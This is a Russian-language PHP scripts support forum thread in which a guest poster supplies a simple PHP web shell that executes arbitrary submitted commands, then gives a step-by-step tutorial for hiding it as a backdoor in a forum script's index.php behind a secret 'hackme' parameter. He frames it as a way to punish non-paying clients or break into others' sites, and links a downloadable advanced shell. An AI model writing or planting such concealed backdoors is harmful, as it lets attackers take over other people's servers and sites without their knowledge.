 |
Бесплатные PHP скрипты - форум техподдержки |
Форум техподдержки WR-Скриптов на php. Обсуждаем: основы программирования на PHP 5 - 7 версий, различные подходы к написанию скриптов на php 7 без MySQL. А также WR-скрипты: бесплатные доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Анекдот и другие. Принимаются пожелания для новых версий. Сообщите какой скрипт нужен для Вашего сайта, постараемся найти или реализовать. Скачать скрипты можно бесплатно. Вместе мы сделаем бесплатные php скрипты лучше и доступнее!
|
| Сегодня: 23.04.2024 - 19:01:10
Страницы: 1 Если хостер не дал доступа к консоли сервера.| Объявление - WR-Scriptы в UTF-8 кодировке |
|---|
Активно обновляю скрипты и перевожу их в UTF-8 кодировку. Список перекодированных php скриптов доступен на главной странице сайта. Скачивайте скрипты и устанавливайте на свой сайт! В ближайшее время обновлю каталог знакомств, форум Про, фотоальбом, доски объявлений лайт и ЛЮКС.
На форуме, пожалуйста, пишите что модернизировать в скриптах в первую очередь. Постараюсь исправить большую часть пожеланий!
Планирую продолжить работы весь 2023 год.
|
| Автор | Сообщение |
|---|
-Rootman- •
- гость
|
Большинстве бесплатных хостингов обычно не дают доступа к консоли своего сервера через SSH, иногда даже на платных за эту услугу приходится платить.
Обидно???
Не все так фатально как кажется. Самодельную консоль легко можно написать на PHP, загрузить на сервер и выполнять на нем нужные консольные команды. Обычно такая необходимость возникает при создании резервных копий MySQL-баз данных или для ее восстановления если в скрипте нет такой возможности.
Вот текст простейшего скрипта на PHP, реализующего такой "PHP - Shell"
| |
|
| Сообщение # 1 |
21.09.07 - 08:22:12
|  |
-Rootman- •
- гость
|
Код:
<?
set_time_limit(0);
print "<b>UNIX Console script.</b>
";
if (isset($_POST['cmd'])) {
$x=$_POST['cmd'];
}
print "Result of <b>".$_POST['cmd']."</b>:
";
if ($x != "") {
$y=`$x`;
$y=str_replace("n","
",$y);
print $y;
}
print '
<form method="POST" action="shell.php" >
#bash:<input type="text" name="cmd" size="80">
</form> ';
?>
|
Этот скриптик надо сохранить под именем shell.php, загрузить его на сервер, запустить и все, можно выполнять на хостинге любые команды, которые он позволяет.
Мне с помощью этого скрипта даже команды configure --prefix=путь; make; make install
удавалось выполнить и тем самым скомпилировать на сервере программу на языке Си.
Так же удавалось запускать на сервере уже скомпилированный, бинарный файл в режиме демона. Например сервер IRC.
Скрипт написан для систем UNIX, но должен нормально работать и в Windows.
Например если на сервер закачать трояна и... 
Ну вообщем продолжать лучше не буду.
=================
Надеюсь кому-нибудь моя хитрость пригодится.
| |
|
| Сообщение # 2 |
21.09.07 - 08:27:12
| |
-Rootman- •
- гость
|
Да, кстати у меня есть и более продвинутый скрипт PHP-shell. Дающий доступ к консоли по логину и пароля, а так же позволяющий выбирать кодировку. (Для работы с русскими именами файлов это важно).
Нужен кому?
| |
|
| Сообщение # 3 |
21.09.07 - 09:15:26
| |
-Rootman- •
- гость
|
Хмм... Хоть никого мои хитрости не заинтересовали, но я пожалуй все же прочту лекцию на тему "Как бэкдорить скрипты посредством php-shell".
Сейчас я расскажу тебе дружок, как бэкдорить скрипты.
Это может быть нужно по следующим причинам:
1. Ты сделал сайт на заказ, но админ не хочет платить деньги. Тогда его можно будет запросто наказать грохнув его сайт как следует.
2. Часто бывает нужно выполнить на сервере резервное копирование данных, но сам скрипт этого делать не умеет.
3. Просто для развлечения.
4. Для откровенного взлома чужих сайтов, админы которых имеют неосторжность поставить твой скрипт. (УК РФ предупреждает - уголовно наказуемо).
Для примера будем бэкдорить WR-Forum, файл index.php
Для начала сам скрипт бэкдора, он занимает всего 370 байт текста.
Вот он:
Код:
<?set_time_limit(0);print "<b>PHP-Shell.</b>
";if (isset($_POST['cmd'])) $x=$_POST['cmd']; else $x="";print "Result of <b>".$x."</b>:
";if ($x != "") {$y=`$x`;$y=str_replace("<","<",$y);$y=str_replace(">",">",$y);$y=str_replace("n","
",$y);print $y;}print '<form method="POST" action="comp.php" >#:<input type="text" name="cmd" size="80"></form> ';?>
|
Прежде всего нужно придумать команду, которя будет запускать бэкдор,
пусть это будет например http://ардес_сайта/index.php?hackme
p.s. В реальных условиях вместо hackme рекомендую придумать что-нибудь посложнее.
Ищем в скрипте строчку action="comp.php"
и меняем ее на:
action="index.php?hackme"
Запомни, здесь вместо index.php должно стоять имя файла, в который ты ставишь бэкдор.
Теперь добавим в скрипт условие, проверяющее ввод нашей "секретной команды" (hackme), которая будет запускать наш бэкдор.
В результате бэкдор принимает такой вид:
Код:
if (isset($_GET['hackme'])) {
set_time_limit(0);print "<b>PHP-Shell.</b>
";if (isset($_POST['cmd'])) $x=$_POST['cmd']; else $x="";print "Result of <b>".$x."</b>:
";if ($x != "") {$y=`$x`;$y=str_replace("<","<",$y);$y=str_replace(">",">",$y);$y=str_replace("n","
",$y);print $y;}print '<form method="POST" action="index.php?hackme" >#:<input type="text" name="cmd" size="80"></form>';
exit;}
|
Это и есть готовый результат.
Все что осталось - вставить его куда-нибудь поглубже в скрипт, чтобы было малозаметно.
Можно например так:
Находим в index.php записи:
Код:
if (!isset($_GET['event'])) {
// Блок выводит в статусной строке: ТЕМА -> РАЗДЕЛ -> ФОРУМ
|
И вставляем перед этими строчками наше чудовище.
Сохраняем файло. Вот и все.
Проверяем, работает-ли форум:
http://адрес_сайта/index.php
Все отлично работет как будто ничего и нет.
Ну а теперь:
http://адрес_сайта/index.php?hackme
И......
И консоль сервера наша, можно делать в ней что угодно!
===========
Все спасибо, аудитория сводобна.... | |
|
| Сообщение # 4 |
22.09.07 - 09:15:01
|
|
dev •
D гость
|
Буду благодарен, если объяснишь как менять кодировку для вывода рнр-скриптом в консоль русский текст! Да и PHP-shell не помешает ! | |
|
| Сообщение # 5 |
26.09.07 - 00:47:04
| |
-Rootman- •
- гость
|
dev, под Виндой или под UNIX?
А то кодировки у них разные.
Короче так.
Вот скрипт PHP-shell дающий доступ по логину и паролю и позволяющий выбирать кодировку.
Для Винды надо выбирать - cp866, для исистем UNIX - KOI8-R
Остальные кодировки приведены для совместимости.
Качать здесь: http://draculacastle.narod.ru/shell.zip
| |
|
| Сообщение # 6 |
26.09.07 - 12:11:25
| |
Страницы: 1
|
Главная сайта